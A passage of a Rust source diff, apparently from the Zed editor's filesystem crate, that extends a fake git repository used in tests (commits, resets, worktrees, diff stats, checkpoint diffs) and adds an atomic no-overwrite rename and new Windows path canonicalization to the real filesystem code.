anyhow::bail!( + "Cannot reset {pop_count} commit(s): only {} in history", + state.commit_history.len() + ); + } + + let target_index = state.commit_history.len() - pop_count; + let snapshot = state.commit_history[target_index].clone(); + state.commit_history.truncate(target_index); + + match mode { + ResetMode::Soft => { + state.head_contents = snapshot.head_contents; + } + ResetMode::Mixed => { + state.head_contents = snapshot.head_contents; + state.index_contents = state.head_contents.clone(); + } + } + + state.refs.insert("HEAD".into(), snapshot.sha); + Ok(()) + }) } fn checkout_files( @@ -379,18 +431,20 @@ impl GitRepository for FakeGitRepository { } fn stash_entries(&self) -> BoxFuture<'_, Result> { - async { Ok(git::stash::GitStash::default()) }.boxed() + self.with_state_async(false, |state| Ok(state.stash_entries.clone())) } fn branches(&self) -> BoxFuture<'_, Result>> { self.with_state_async(false, move |state| { let current_branch = &state.current_branch_name; - Ok(state + let mut branches = state .branches .iter() .map(|branch_name| { let ref_name = if branch_name.starts_with("refs/") { branch_name.into() + } else if branch_name.contains('/') { + format!("refs/remotes/{branch_name}").into() } else { format!("refs/heads/{branch_name}").into() }; @@ -401,53 +455,163 @@ impl GitRepository for FakeGitRepository { upstream: None, } }) - .collect()) + .collect::>(); + // compute snapshot expects these to be sorted by ref_name + // because that's what git itself does + branches.sort_by(|a, b| a.ref_name.cmp(&b.ref_name)); + Ok(branches) }) } fn worktrees(&self) -> BoxFuture<'_, Result>> { - self.with_state_async(false, |state| Ok(state.worktrees.clone())) + let fs = self.fs.clone(); + let common_dir_path = self.common_dir_path.clone(); + let executor = self.executor.clone(); + + async move { + executor.simulate_random_delay().await; + + let (main_worktree, refs) = fs.with_git_state(&common_dir_path, false, |state| { + let work_dir = common_dir_path + .parent() + .map(PathBuf::from) + .unwrap_or_else(|| common_dir_path.clone()); + let head_sha = state + .refs + .get("HEAD") + .cloned() + .unwrap_or_else(|| "0000000".to_string()); + let branch_ref = state + .current_branch_name + .as_ref() + .map(|name| format!("refs/heads/{name}")) + .unwrap_or_else(|| "refs/heads/main".to_string()); + let main_wt = Worktree { + path: work_dir, + ref_name: Some(branch_ref.into()), + sha: head_sha.into(), + is_main: true, + }; + (main_wt, state.refs.clone()) + })?; + + let mut all = vec![main_worktree]; + + let worktrees_dir = common_dir_path.join("worktrees"); + if let Ok(mut entries) = fs.read_dir(&worktrees_dir).await { + use futures::StreamExt; + while let Some(Ok(entry_path)) = entries.next().await { + let head_content = match fs.load(&entry_path.join("HEAD")).await { + Ok(content) => content, + Err(_) => continue, + }; + let gitdir_content = match fs.load(&entry_path.join("gitdir")).await { + Ok(content) => content, + Err(_) => continue, + }; + + let ref_name = head_content + .strip_prefix("ref: ") + .map(|s| s.trim().to_string()); + let sha = ref_name + .as_ref() + .and_then(|r| refs.get(r)) + .cloned() + .unwrap_or_else(|| head_content.trim().to_string()); + + let worktree_path = PathBuf::from(gitdir_content.trim()) + .parent() + .map(PathBuf::from) + .unwrap_or_default(); + + all.push(Worktree { + path: worktree_path, + ref_name: ref_name.map(Into::into), + sha: sha.into(), + is_main: false, + }); + } + } + + Ok(all) + } + .boxed() } fn create_worktree( &self, - name: String, - directory: PathBuf, + branch_name: Option, + path: PathBuf, from_commit: Option, ) -> BoxFuture<'_, Result<()>> { let fs = self.fs.clone(); let executor = self.executor.clone(); let dot_git_path = self.dot_git_path.clone(); + let common_dir_path = self.common_dir_path.clone(); async move { - let path = directory.join(&name); executor.simulate_random_delay().await; - // Check for simulated error before any side effects + // Check for simulated error and duplicate branch before any side effects. fs.with_git_state(&dot_git_path, false, |state| { if let Some(message) = &state.simulated_create_worktree_error { anyhow::bail!("{message}"); } + if let Some(ref name) = branch_name { + if state.branches.contains(name) { + bail!("a branch named '{}' already exists", name); + } + } Ok(()) })??; - // Create directory before updating state so state is never - // inconsistent with the filesystem + + // Create the worktree checkout directory. fs.create_dir(&path).await?; - fs.with_git_state(&dot_git_path, true, { - let path = path.clone(); - move |state| { - if state.branches.contains(&name) { - bail!("a branch named '{}' already exists", name); - } - let ref_name = format!("refs/heads/{name}"); - let sha = from_commit.unwrap_or_else(|| "fake-sha".to_string()); - state.refs.insert(ref_name.clone(), sha.clone()); - state.worktrees.push(Worktree { - path, - ref_name: ref_name.into(), - sha: sha.into(), - }); - state.branches.insert(name); - Ok::<(), anyhow::Error>(()) + + // Create .git/worktrees// directory with HEAD, commondir, gitdir. + let worktree_entry_name = branch_name + .as_deref() + .unwrap_or_else(|| path.file_name().unwrap().to_str().unwrap()); + let worktrees_entry_dir = common_dir_path.join("worktrees").join(worktree_entry_name); + fs.create_dir(&worktrees_entry_dir).await?; + + let sha = from_commit.unwrap_or_else(|| "fake-sha".to_string()); + let head_content = if let Some(ref branch_name) = branch_name { + let ref_name = format!("refs/heads/{branch_name}"); + format!("ref: {ref_name}") + } else { + sha.clone() + }; + fs.write_file_internal( + worktrees_entry_dir.join("HEAD"), + head_content.into_bytes(), + false, + )?; + fs.write_file_internal( + worktrees_entry_dir.join("commondir"), + common_dir_path.to_string_lossy().into_owned().into_bytes(), + false, + )?; + let worktree_dot_git = path.join(".git"); + fs.write_file_internal( + worktrees_entry_dir.join("gitdir"), + worktree_dot_git.to_string_lossy().into_owned().into_bytes(), + false, + )?; + + // Create .git file in the worktree checkout. + fs.write_file_internal( + &worktree_dot_git, + format!("gitdir: {}", worktrees_entry_dir.display()).into_bytes(), + false, + )?; + + // Update git state: add ref and branch. + fs.with_git_state(&dot_git_path, true, move |state| { + if let Some(branch_name) = branch_name { + let ref_name = format!("refs/heads/{branch_name}"); + state.refs.insert(ref_name, sha); + state.branches.insert(branch_name); } + Ok::<(), anyhow::Error>(()) })??; Ok(()) } @@ -457,20 +621,23 @@ impl GitRepository for FakeGitRepository { fn remove_worktree(&self, path: PathBuf, _force: bool) -> BoxFuture<'_, Result<()>> { let fs = self.fs.clone(); let executor = self.executor.clone(); - let dot_git_path = self.dot_git_path.clone(); + let common_dir_path = self.common_dir_path.clone(); async move { executor.simulate_random_delay().await; - // Validate the worktree exists in state before touching the filesystem - fs.with_git_state(&dot_git_path, false, { - let path = path.clone(); - move |state| { - if !state.worktrees.iter().any(|w| w.path == path) { - bail!("no worktree found at path: {}", path.display()); - } - Ok(()) - } - })??; - // Now remove the directory + + // Read the worktree's .git file to find its entry directory. + let dot_git_file = path.join(".git"); + let content = fs + .load(&dot_git_file) + .await + .with_context(|| format!("no worktree found at path: {}", path.display()))?; + let gitdir = content + .strip_prefix("gitdir:") + .context("invalid .git file in worktree")? + .trim(); + let worktree_entry_dir = PathBuf::from(gitdir); + + // Remove the worktree checkout directory. fs.remove_dir( &path, RemoveOptions { @@ -479,11 +646,21 @@ impl GitRepository for FakeGitRepository { }, ) .await?; - // Update state - fs.with_git_state(&dot_git_path, true, move |state| { - state.worktrees.retain(|worktree| worktree.path != path); - Ok::<(), anyhow::Error>(()) - })??; + + // Remove the .git/worktrees// directory. + fs.remove_dir( + &worktree_entry_dir, + RemoveOptions { + recursive: true, + ignore_if_not_exists: false, + }, + ) + .await?; + + // Emit a git event on the main .git directory so the scanner + // notices the change. + fs.with_git_state(&common_dir_path, true, |_| {})?; + Ok(()) } .boxed() @@ -492,20 +669,23 @@ impl GitRepository for FakeGitRepository { fn rename_worktree(&self, old_path: PathBuf, new_path: PathBuf) -> BoxFuture<'_, Result<()>> { let fs = self.fs.clone(); let executor = self.executor.clone(); - let dot_git_path = self.dot_git_path.clone(); + let common_dir_path = self.common_dir_path.clone(); async move { executor.simulate_random_delay().await; - // Validate the worktree exists in state before touching the filesystem - fs.with_git_state(&dot_git_path, false, { - let old_path = old_path.clone(); - move |state| { - if !state.worktrees.iter().any(|w| w.path == old_path) { - bail!("no worktree found at path: {}", old_path.display()); - } - Ok(()) - } - })??; - // Now move the directory + + // Read the worktree's .git file to find its entry directory. + let dot_git_file = old_path.join(".git"); + let content = fs + .load(&dot_git_file) + .await + .with_context(|| format!("no worktree found at path: {}", old_path.display()))?; + let gitdir = content + .strip_prefix("gitdir:") + .context("invalid .git file in worktree")? + .trim(); + let worktree_entry_dir = PathBuf::from(gitdir); + + // Move the worktree checkout directory. fs.rename( &old_path, &new_path, @@ -516,16 +696,27 @@ impl GitRepository for FakeGitRepository { }, ) .await?; - // Update state - fs.with_git_state(&dot_git_path, true, move |state| { - let worktree = state - .worktrees - .iter_mut() - .find(|worktree| worktree.path == old_path) - .expect("worktree was validated above"); - worktree.path = new_path; - Ok::<(), anyhow::Error>(()) - })??; + + // Update the gitdir file in .git/worktrees// to point to the + // new location. + let new_dot_git = new_path.join(".git"); + fs.write_file_internal( + worktree_entry_dir.join("gitdir"), + new_dot_git.to_string_lossy().into_owned().into_bytes(), + false, + )?; + + // Update the .git file in the moved worktree checkout. + fs.write_file_internal( + &new_dot_git, + format!("gitdir: {}", worktree_entry_dir.display()).into_bytes(), + false, + )?; + + // Emit a git event on the main .git directory so the scanner + // notices the change. + fs.with_git_state(&common_dir_path, true, |_| {})?; + Ok(()) } .boxed() @@ -544,6 +735,11 @@ impl GitRepository for FakeGitRepository { _base_branch: Option, ) -> BoxFuture<'_, Result<()>> { self.with_state_async(true, move |state| { + if let Some((remote, _)) = name.split_once('/') + && !state.remotes.contains_key(remote) + { + state.remotes.insert(remote.to_owned(), "".to_owned()); + } state.branches.insert(name); Ok(()) }) @@ -562,7 +758,7 @@ impl GitRepository for FakeGitRepository { }) } - fn delete_branch(&self, name: String) -> BoxFuture<'_, Result<()>> { + fn delete_branch(&self, _is_remote: bool, name: String) -> BoxFuture<'_, Result<()>> { self.with_state_async(true, move |state| { if !state.branches.remove(&name) { bail!("no such branch: {name}"); @@ -689,11 +885,30 @@ impl GitRepository for FakeGitRepository { &self, _message: gpui::SharedString, _name_and_email: Option<(gpui::SharedString, gpui::SharedString)>, - _options: CommitOptions, + options: CommitOptions, _askpass: AskPassDelegate, _env: Arc>, ) -> BoxFuture<'_, Result<()>> { - async { Ok(()) }.boxed() + self.with_state_async(true, move |state| { + if !options.allow_empty && !options.amend && state.index_contents == state.head_contents + { + anyhow::bail!("nothing to commit (use allow_empty to create an empty commit)"); + } + + let old_sha = state.refs.get("HEAD").cloned().unwrap_or_default(); + state.commit_history.push(FakeCommitSnapshot { + head_contents: state.head_contents.clone(), + index_contents: state.index_contents.clone(), + sha: old_sha, + }); + + state.head_contents = state.index_contents.clone(); + + let new_sha = format!("fake-commit-{}", state.commit_history.len()); + state.refs.insert("HEAD".into(), new_sha); + + Ok(()) + }) } fn run_hook( @@ -765,13 +980,13 @@ impl GitRepository for FakeGitRepository { } fn diff(&self, _diff: git::repository::DiffType) -> BoxFuture<'_, Result> { - unimplemented!() + future::ready(Ok(String::new())).boxed() } fn diff_stat( &self, - diff_type: git::repository::DiffType, - ) -> BoxFuture<'_, Result>> { + path_prefixes: &[RepoPath], + ) -> BoxFuture<'_, Result> { fn count_lines(s: &str) -> u32 { if s.is_empty() { 0 @@ -780,122 +995,95 @@ impl GitRepository for FakeGitRepository { } } - match diff_type { - git::repository::DiffType::HeadToIndex => self - .with_state_async(false, |state| { - let mut result = HashMap::default(); - let all_paths: HashSet<&RepoPath> = state - .head_contents - .keys() - .chain(state.index_contents.keys()) - .collect(); - for path in all_paths { - let head = state.head_contents.get(path); - let index = state.index_contents.get(path); - match (head, index) { - (Some(old), Some(new)) if old != new => { - result.insert( - path.clone(), - git::status::DiffStat { - added: count_lines(new), - deleted: count_lines(old), - }, - ); - } - (Some(old), None) => { - result.insert( - path.clone(), - git::status::DiffStat { - added: 0, - deleted: count_lines(old), - }, - ); - } - (None, Some(new)) => { - result.insert( - path.clone(), - git::status::DiffStat { - added: count_lines(new), - deleted: 0, - }, - ); - } - _ => {} - } - } - Ok(result) - }) - .boxed(), - git::repository::DiffType::HeadToWorktree => { - let workdir_path = self.dot_git_path.parent().unwrap().to_path_buf(); - let worktree_files: HashMap = self + fn matches_prefixes(path: &RepoPath, prefixes: &[RepoPath]) -> bool { + if prefixes.is_empty() { + return true; + } + prefixes.iter().any(|prefix| { + let prefix_str = prefix.as_unix_str(); + if prefix_str == "." { + return true; + } + path == prefix || path.starts_with(&prefix) + }) + } + + let path_prefixes = path_prefixes.to_vec(); + + let workdir_path = self.dot_git_path.parent().unwrap().to_path_buf(); + let worktree_files: HashMap = self + .fs + .files() + .iter() + .filter_map(|path| { + let repo_path = path.strip_prefix(&workdir_path).ok()?; + if repo_path.starts_with(".git") { + return None; + } + let content = self .fs - .files() - .iter() - .filter_map(|path| { - let repo_path = path.strip_prefix(&workdir_path).ok()?; - if repo_path.starts_with(".git") { - return None; - } - let content = self - .fs - .read_file_sync(path) - .ok() - .and_then(|bytes| String::from_utf8(bytes).ok())?; - let repo_path = RelPath::new(repo_path, PathStyle::local()).ok()?; - Some((RepoPath::from_rel_path(&repo_path), content)) - }) - .collect(); + .read_file_sync(path) + .ok() + .and_then(|bytes| String::from_utf8(bytes).ok())?; + let repo_path = RelPath::new(repo_path, PathStyle::local()).ok()?; + Some((RepoPath::from_rel_path(&repo_path), content)) + }) + .collect(); - self.with_state_async(false, move |state| { - let mut result = HashMap::default(); - let all_paths: HashSet<&RepoPath> = state - .head_contents + self.with_state_async(false, move |state| { + let mut entries = Vec::new(); + let all_paths: HashSet<&RepoPath> = state + .head_contents + .keys() + .chain( + worktree_files .keys() - .chain(worktree_files.keys()) - .collect(); - for path in all_paths { - let head = state.head_contents.get(path); - let worktree = worktree_files.get(path); - match (head, worktree) { - (Some(old), Some(new)) if old != new => { - result.insert( - path.clone(), - git::status::DiffStat { - added: count_lines(new), - deleted: count_lines(old), - }, - ); - } - (Some(old), None) => { - result.insert( - path.clone(), - git::status::DiffStat { - added: 0, - deleted: count_lines(old), - }, - ); - } - (None, Some(new)) => { - result.insert( - path.clone(), - git::status::DiffStat { - added: count_lines(new), - deleted: 0, - }, - ); - } - _ => {} - } + .filter(|p| state.index_contents.contains_key(*p)), + ) + .collect(); + for path in all_paths { + if !matches_prefixes(path, &path_prefixes) { + continue; + } + let head = state.head_contents.get(path); + let worktree = worktree_files.get(path); + match (head, worktree) { + (Some(old), Some(new)) if old != new => { + entries.push(( + path.clone(), + git::status::DiffStat { + added: count_lines(new), + deleted: count_lines(old), + }, + )); } - Ok(result) - }) - .boxed() - } - git::repository::DiffType::MergeBase { .. } => { - future::ready(Ok(HashMap::default())).boxed() + (Some(old), None) => { + entries.push(( + path.clone(), + git::status::DiffStat { + added: 0, + deleted: count_lines(old), + }, + )); + } + (None, Some(new)) => { + entries.push(( + path.clone(), + git::status::DiffStat { + added: count_lines(new), + deleted: 0, + }, + )); + } + _ => {} + } } - } + entries.sort_by(|(a, _), (b, _)| a.cmp(b)); + Ok(git::status::GitDiffStat { + entries: entries.into(), + }) + }) + .boxed() } fn checkpoint(&self) -> BoxFuture<'static, Result> { @@ -954,10 +1142,88 @@ impl GitRepository for FakeGitRepository { fn diff_checkpoints( &self, - _base_checkpoint: GitRepositoryCheckpoint, - _target_checkpoint: GitRepositoryCheckpoint, + base_checkpoint: GitRepositoryCheckpoint, + target_checkpoint: GitRepositoryCheckpoint, ) -> BoxFuture<'_, Result> { - unimplemented!() + let executor = self.executor.clone(); + let checkpoints = self.checkpoints.clone(); + async move { + executor.simulate_random_delay().await; + let checkpoints = checkpoints.lock(); + let base = checkpoints + .get(&base_checkpoint.commit_sha) + .context(format!( + "invalid base checkpoint: {}", + base_checkpoint.commit_sha + ))?; + let target = checkpoints + .get(&target_checkpoint.commit_sha) + .context(format!( + "invalid target checkpoint: {}", + target_checkpoint.commit_sha + ))?; + + fn collect_files( + entry: &FakeFsEntry, + prefix: String, + out: &mut std::collections::BTreeMap, + ) { + match entry { + FakeFsEntry::File { content, .. } => { + out.insert(prefix, String::from_utf8_lossy(content).into_owned()); + } + FakeFsEntry::Dir { entries, .. } => { + for (name, child) in entries { + let path = if prefix.is_empty() { + name.clone() + } else { + format!("{prefix}/{name}") + }; + collect_files(child, path, out); + } + } + FakeFsEntry::Symlink { .. } => {} + } + } + + let mut base_files = std::collections::BTreeMap::new(); + let mut target_files = std::collections::BTreeMap::new(); + collect_files(base, String::new(), &mut base_files); + collect_files(target, String::new(), &mut target_files); + + let all_paths: std::collections::BTreeSet<&String> = + base_files.keys().chain(target_files.keys()).collect(); + + let mut diff = String::new(); + for path in all_paths { + match (base_files.get(path), target_files.get(path)) { + (Some(base_content), Some(target_content)) + if base_content != target_content => + { + diff.push_str(&format!("diff --git a/{path} b/{path}\n")); + diff.push_str(&format!("--- a/{path}\n")); + diff.push_str(&format!("+++ b/{path}\n")); + for line in base_content.lines() { + diff.push_str(&format!("-{line}\n")); + } + for line in target_content.lines() { + diff.push_str(&format!("+{line}\n")); + } + } + (Some(_), None) => { + diff.push_str(&format!("diff --git a/{path} /dev/null\n")); + diff.push_str("deleted file\n"); + } + (None, Some(_)) => { + diff.push_str(&format!("diff --git /dev/null b/{path}\n")); + diff.push_str("new file\n"); + } + _ => {} + } + } + Ok(diff) + } + .boxed() } fn default_branch( @@ -983,6 +1249,11 @@ impl GitRepository for FakeGitRepository { fn remove_remote(&self, name: String) -> BoxFuture<'_, Result<()>> { self.with_state_async(true, move |state| { + state.branches.retain(|branch| { + branch + .split_once('/') + .is_none_or(|(remote, _)| remote != name) + }); state.remotes.remove(&name); Ok(()) }) @@ -1008,149 +1279,43 @@ impl GitRepository for FakeGitRepository { .boxed() } + fn search_commits( + &self, + _log_source: LogSource, + _search_args: SearchCommitArgs, + _request_tx: Sender, + ) -> BoxFuture<'_, Result<()>> { + async { bail!("search_commits not supported for FakeGitRepository") }.boxed() + } + fn commit_data_reader(&self) -> Result { anyhow::bail!("commit_data_reader not supported for FakeGitRepository") } -} -#[cfg(test)] -mod tests { - use super::*; - use crate::{FakeFs, Fs}; - use gpui::TestAppContext; - use serde_json::json; - use std::path::Path; - - #[gpui::test] - async fn test_fake_worktree_lifecycle(cx: &mut TestAppContext) { - let worktree_dir_settings = &["../worktrees", ".git/zed-worktrees", "my-worktrees/"]; - - for worktree_dir_setting in worktree_dir_settings { - let fs = FakeFs::new(cx.executor()); - fs.insert_tree("/project", json!({".git": {}, "file.txt": "content"})) - .await; - let repo = fs - .open_repo(Path::new("/project/.git"), None) - .expect("should open fake repo"); - - // Initially no worktrees - let worktrees = repo.worktrees().await.unwrap(); - assert!(worktrees.is_empty()); - - let expected_dir = git::repository::resolve_worktree_directory( - Path::new("/project"), - worktree_dir_setting, - ); - - // Create a worktree - repo.create_worktree( - "feature-branch".to_string(), - expected_dir.clone(), - Some("abc123".to_string()), - ) - .await - .unwrap(); - - // List worktrees — should have one - let worktrees = repo.worktrees().await.unwrap(); - assert_eq!(worktrees.len(), 1); - assert_eq!( - worktrees[0].path, - expected_dir.join("feature-branch"), - "failed for worktree_directory setting: {worktree_dir_setting:?}" - ); - assert_eq!(worktrees[0].ref_name.as_ref(), "refs/heads/feature-branch"); - assert_eq!(worktrees[0].sha.as_ref(), "abc123"); - - // Directory should exist in FakeFs after create - assert!( - fs.is_dir(&expected_dir.join("feature-branch")).await, - "worktree directory should be created in FakeFs for setting {worktree_dir_setting:?}" - ); - - // Create a second worktree (without explicit commit) - repo.create_worktree("bugfix-branch".to_string(), expected_dir.clone(), None) - .await - .unwrap(); - - let worktrees = repo.worktrees().await.unwrap(); - assert_eq!(worktrees.len(), 2); - assert!( - fs.is_dir(&expected_dir.join("bugfix-branch")).await, - "second worktree directory should be created in FakeFs for setting {worktree_dir_setting:?}" - ); - - // Rename the first worktree - repo.rename_worktree( - expected_dir.join("feature-branch"), - expected_dir.join("renamed-branch"), - ) - .await - .unwrap(); + fn update_ref(&self, ref_name: String, commit: String) -> BoxFuture<'_, Result<()>> { + self.with_state_async(true, move |state| { + state.refs.insert(ref_name, commit); + Ok(()) + }) + } - let worktrees = repo.worktrees().await.unwrap(); - assert_eq!(worktrees.len(), 2); - assert!( - worktrees - .iter() - .any(|w| w.path == expected_dir.join("renamed-branch")), - "renamed worktree should exist at new path for setting {worktree_dir_setting:?}" - ); - assert!( - worktrees - .iter() - .all(|w| w.path != expected_dir.join("feature-branch")), - "old path should no longer exist for setting {worktree_dir_setting:?}" - ); - - // Directory should be moved in FakeFs after rename - assert!( - !fs.is_dir(&expected_dir.join("feature-branch")).await, - "old worktree directory should not exist after rename for setting {worktree_dir_setting:?}" - ); - assert!( - fs.is_dir(&expected_dir.join("renamed-branch")).await, - "new worktree directory should exist after rename for setting {worktree_dir_setting:?}" - ); - - // Rename a nonexistent worktree should fail - let result = repo - .rename_worktree(PathBuf::from("/nonexistent"), PathBuf::from("/somewhere")) - .await; - assert!(result.is_err()); - - // Remove a worktree - repo.remove_worktree(expected_dir.join("renamed-branch"), false) - .await - .unwrap(); - - let worktrees = repo.worktrees().await.unwrap(); - assert_eq!(worktrees.len(), 1); - assert_eq!(worktrees[0].path, expected_dir.join("bugfix-branch")); - - // Directory should be removed from FakeFs after remove - assert!( - !fs.is_dir(&expected_dir.join("renamed-branch")).await, - "worktree directory should be removed from FakeFs for setting {worktree_dir_setting:?}" - ); - - // Remove a nonexistent worktree should fail - let result = repo - .remove_worktree(PathBuf::from("/nonexistent"), false) - .await; - assert!(result.is_err()); - - // Remove the last worktree - repo.remove_worktree(expected_dir.join("bugfix-branch"), false) - .await - .unwrap(); - - let worktrees = repo.worktrees().await.unwrap(); - assert!(worktrees.is_empty()); - assert!( - !fs.is_dir(&expected_dir.join("bugfix-branch")).await, - "last worktree directory should be removed from FakeFs for setting {worktree_dir_setting:?}" - ); - } + fn delete_ref(&self, ref_name: String) -> BoxFuture<'_, Result<()>> { + self.with_state_async(true, move |state| { + state.refs.remove(&ref_name); + Ok(()) + }) + } + + fn repair_worktrees(&self) -> BoxFuture<'_, Result<()>> { + async { Ok(()) }.boxed() + } + + fn set_trusted(&self, trusted: bool) { + self.is_trusted + .store(trusted, std::sync::atomic::Ordering::Release); + } + + fn is_trusted(&self) -> bool { + self.is_trusted.load(std::sync::atomic::Ordering::Acquire) } } diff --git a/crates/fs/src/fs.rs b/crates/fs/src/fs.rs index 2db9e48a2e77bdb3e49fce0b16ea9b67ffaacbc0..a26abb81255003e4059f9bcc8a68aa3c6212a73a 100644 --- a/crates/fs/src/fs.rs +++ b/crates/fs/src/fs.rs @@ -15,10 +15,14 @@ use gpui::Global; use gpui::ReadGlobal as _; use gpui::SharedString; use std::borrow::Cow; +#[cfg(unix)] +use std::ffi::CString; use util::command::new_command; #[cfg(unix)] use std::os::fd::{AsFd, AsRawFd}; +#[cfg(unix)] +use std::os::unix::ffi::OsStrExt; #[cfg(unix)] use std::os::unix::fs::{FileTypeExt, MetadataExt}; @@ -33,7 +37,7 @@ use is_executable::IsExecutable; use rope::Rope; use serde::{Deserialize, Serialize}; use smol::io::AsyncWriteExt; -#[cfg(any(target_os = "windows", feature = "test-support"))] +#[cfg(feature = "test-support")] use std::path::Component; use std::{ io::{self, Write}, @@ -53,9 +57,11 @@ use collections::{BTreeMap, btree_map}; use fake_git_repo::FakeGitRepositoryState; #[cfg(feature = "test-support")] use git::{ - repository::{InitialGraphCommitData, RepoPath, repo_path}, + repository::{InitialGraphCommitData, RepoPath, Worktree, repo_path}, status::{FileStatus, StatusCode, TrackedStatus, UnmergedStatus}, }; +#[cfg(feature = "test-support")] +use util::normalize_path; #[cfg(feature = "test-support")] use smol::io::AsyncReadExt; @@ -72,6 +78,7 @@ pub enum PathEventKind { Removed, Created, Changed, + Rescan, } #[derive(Clone, PartialEq, Eq, PartialOrd, Ord, Debug)] @@ -143,7 +150,7 @@ pub trait Fs: Send + Sync { &self, abs_dot_git: &Path, system_git_binary_path: Option<&Path>, - ) -> Option>; + ) -> Result>; async fn git_init(&self, abs_work_directory: &Path, fallback_branch_name: String) -> Result<()>; async fn git_clone(&self, repo_url: &str, abs_work_directory: &Path) -> Result<()>; @@ -427,83 +434,101 @@ impl RealFs { #[cfg(target_os = "windows")] fn canonicalize(path: &Path) -> Result { - let mut strip_prefix = None; + use std::ffi::OsString; + use std::os::windows::ffi::OsStringExt; + use windows::Win32::Storage::FileSystem::GetVolumePathNameW; + use windows::core::HSTRING; - let mut new_path = PathBuf::new(); - for component in path.components() { - match component { - std::path::Component::Prefix(_) => { - let component = component.as_os_str(); - let canonicalized = if component - .to_str() - .map(|e| e.ends_with("\\")) - .unwrap_or(false) - { - std::fs::canonicalize(component) - } else { - let mut component = component.to_os_string(); - component.push("\\"); - std::fs::canonicalize(component) - }?; - - let mut strip = PathBuf::new(); - for component in canonicalized.components() { - match component { - Component::Prefix(prefix_component) => { - match prefix_component.kind() { - std::path::Prefix::Verbatim(os_str) => { - strip.push(os_str); - } - std::path::Prefix::VerbatimUNC(host, share) => { - strip.push("\\\\"); - strip.push(host); - strip.push(share); - } - std::path::Prefix::VerbatimDisk(disk) => { - strip.push(format!("{}:", disk as char)); - } - _ => strip.push(component), - }; - } - _ => strip.push(component), - } - } - strip_prefix = Some(strip); - new_path.push(component); - } - std::path::Component::RootDir => { - new_path.push(component); - } - std::path::Component::CurDir => { - if strip_prefix.is_none() { - // unrooted path - new_path.push(component); - } - } - std::path::Component::ParentDir => { - if strip_prefix.is_some() { - // rooted path - new_path.pop(); - } else { - new_path.push(component); - } - } - std::path::Component::Normal(_) => { - if let Ok(link) = std::fs::read_link(new_path.join(component)) { - let link = match &strip_prefix { - Some(e) => link.strip_prefix(e).unwrap_or(&link), - None => &link, - }; - new_path.extend(link); - } else { - new_path.push(component); - } - } - } + // std::fs::canonicalize resolves mapped network paths to UNC paths, which can + // confuse some software. To mitigate this, we canonicalize the input, then rebase + // the result onto the input's original volume root if both paths are on the same + // volume. This keeps the same drive letter or mount point the caller used. + + let abs_path = if path.is_relative() { + std::env::current_dir()?.join(path) + } else { + path.to_path_buf() + }; + + let path_hstring = HSTRING::from(abs_path.as_os_str()); + let mut vol_buf = vec![0u16; abs_path.as_os_str().len() + 2]; + unsafe { GetVolumePathNameW(&path_hstring, &mut vol_buf)? }; + let volume_root = { + let len = vol_buf + .iter() + .position(|&c| c == 0) + .unwrap_or(vol_buf.len()); + PathBuf::from(OsString::from_wide(&vol_buf[..len])) + }; + + let resolved_path = dunce::canonicalize(&abs_path)?; + let resolved_root = dunce::canonicalize(&volume_root)?; + + if let Ok(relative) = resolved_path.strip_prefix(&resolved_root) { + let mut result = volume_root; + result.push(relative); + Ok(result) + } else { + Ok(resolved_path) } + } +} - Ok(new_path) +#[cfg(any(target_os = "macos", target_os = "linux"))] +fn rename_without_replace(source: &Path, target: &Path) -> io::Result<()> { + let source = path_to_c_string(source)?; + let target = path_to_c_string(target)?; + + #[cfg(target_os = "macos")] + let result = unsafe { libc::renamex_np(source.as_ptr(), target.as_ptr(), libc::RENAME_EXCL) }; + + #[cfg(target_os = "linux")] + let result = unsafe { + libc::syscall( + libc::SYS_renameat2, + libc::AT_FDCWD, + source.as_ptr(), + libc::AT_FDCWD, + target.as_ptr(), + libc::RENAME_NOREPLACE, + ) + }; + + if result == 0 { + Ok(()) + } else { + Err(io::Error::last_os_error()) + } +} + +#[cfg(target_os = "windows")] +fn rename_without_replace(source: &Path, target: &Path) -> io::Result<()> { + use std::os::windows::ffi::OsStrExt; + + use windows::Win32::Storage::FileSystem::{MOVE_FILE_FLAGS, MoveFileExW}; + use windows::core::PCWSTR; + + let source: Vec = source.as_os_str().encode_wide().chain(Some(0)).collect(); + let target: Vec = target.as_os_str().encode_wide().chain(Some(0)).collect(); + + unsafe { + MoveFileExW( + PCWSTR(source.as_ptr()), + PCWSTR(target.as_ptr()), + MOVE_FILE_FLAGS::default(), + ) } + .map_err(|_| io::Error::last_os_error()) +} + +#[cfg(any(target_os = "macos", target_os = "linux"))] +fn path_to_c_string(path: &Path) -> io::Result { + CString::new(path.as_os_str().as_bytes()).map_err(|_| { + io::Error::new( + io::ErrorKind::InvalidInput, + format!("path contains interior NUL: {}", path.display()), + ) + }) } #[async_trait::async_trait] @@ -588,7 +613,59 @@ impl Fs for RealFs { } async fn rename(&self, source: &Path, target: &Path, options: RenameOptions) -> Result<()> { - if !options.overwrite && smol::fs::metadata(target).await.is_ok() { + if options.create_parents { + if let Some(parent) = target.parent() { + self.create_dir(parent).await?; + } + } + + if options.overwrite { + smol::fs::rename(source, target).await?; + return Ok(()); + } + + let use_metadata_fallback = { + #[cfg(any(target_os = "macos", target_os = "linux", target_os = "windows"))] + { + let source = source.to_path_buf(); + let target = target.to_path_buf(); + match self + .executor + .spawn(async move { rename_without_replace(&source, &target) }) + .await + { + Ok(()) => return Ok(()), + Err(error) if error.kind() == io::ErrorKind::AlreadyExists => { + if options.ignore_if_exists { + return Ok(()); + } + return Err(error.into()); + } + Err(error) + if error.raw_os_error().is_some_and(|code| { + code == libc::ENOSYS + || code == libc::ENOTSUP + || code == libc::EOPNOTSUPP + || code == libc::EINVAL + }) => + { + // For case when filesystem or kernel does not support atomic no-overwrite rename. + // EINVAL is returned by FUSE-based filesystems (e.g. NTFS via ntfs-3g) + // that don't support RENAME_NOREPLACE. + true + } + Err(error) => return Err(error.into()), + } + } + + #[cfg(not(any(target_os = "macos", target_os = "linux", target_os = "windows")))] + { + // For platforms which do not have an atomic no-overwrite rename yet. + true + } + }; + + if use_metadata_fallback && smol::fs::metadata(target).await.is_ok() { if options.ignore_if_exists { return Ok(()); } else { @@ -596,12 +673,6 @@ impl Fs for RealFs { } } - if options.create_parents { - if let Some(parent) = target.parent() { - self.create_dir(parent).await?; - } - } - smol::fs::rename(source, target).await?; Ok(()) } @@ -1045,8 +1116,8 @@ impl Fs for RealFs { &self, dotgit_path: &Path, system_git_binary_path: Option<&Path>, - ) -> Option> { - Some(Arc::new(RealGitRepository::new( + ) -> Result> { + Ok(Arc::new(RealGitRepository::new( dotgit_path, self.bundled_git_binary_path.clone(), 